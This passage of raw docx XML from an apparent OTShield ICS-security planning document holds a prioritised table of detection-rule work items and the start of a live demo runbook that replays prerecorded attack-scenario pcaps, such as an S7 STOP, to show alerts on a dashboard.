          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7 program-download rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-zone HTTP rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Engineering-workstation allowlist UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>06, 10, 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Value-baseline rule (per-coil EWMA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Per-asset learned source allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>02 (variant), 07, 08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNP3 dissector + rate rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EIP/CIP dissector + session-origin rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Sliding-window low-rate scan detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>01 (variant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tag dictionary import + severity boost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>03, 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7 CPU state tracking on Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Value-drift / Mann-Kendall trend rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Maintenance-window suppression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Per-(protocol, fc) severity override map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>04, 08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Effort scale: S = 1–3 days, M = 1–2 weeks, L = &gt; 2 weeks. Effort assumes a single backend engineer familiar with the existing rule-engine pattern (`DpiAnomalyRule` + `@Component` registration). Dissectors (DNP3, EIP/CIP) are L because a fresh dissector requires schema additions to `DpiEvent` plus dedicated unit-test fixtures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Demo runbook (suggested narrative order)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>For a 30-minute live demo to a SOC audience, the following ordering tells a complete kill-chain story while exercising the maximum number of OTShield subsystems. Total wall-clock: ~25 min running attacks + 5 min open Q&amp;A.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="E5E7EB"/>
          <w:left w:val="single" w:sz="4" w:color="E5E7EB"/>
          <w:bottom w:val="single" w:sz="4" w:color="E5E7EB"/>
          <w:right w:val="single" w:sz="4" w:color="E5E7EB"/>
          <w:insideH w:val="single" w:sz="4" w:color="E5E7EB"/>
          <w:insideV w:val="single" w:sz="4" w:color="E5E7EB"/>
        </w:tblBorders>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="3216"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Talking point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+0:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Open Dashboard — empty state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Show 'No real data yet' Anomalies banner. Set the baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+0:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 01 pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Show Anomalies row appear in real time. Hover the new amber edge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+3:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 02 pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>First red edge L3→L1. Click into Anomaly, walk evidence panel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+6:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 04 pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rare-FC anomaly. Show DPI modal histogram for the edge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+9:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 05 pcap (S7 STOP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-protocol — same rule fires for S7 with vendor-specific evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+12:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 07 pcap (IEC-104 sweep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Multi-RTU pattern; show the 'star' shape on the topology.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+15:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
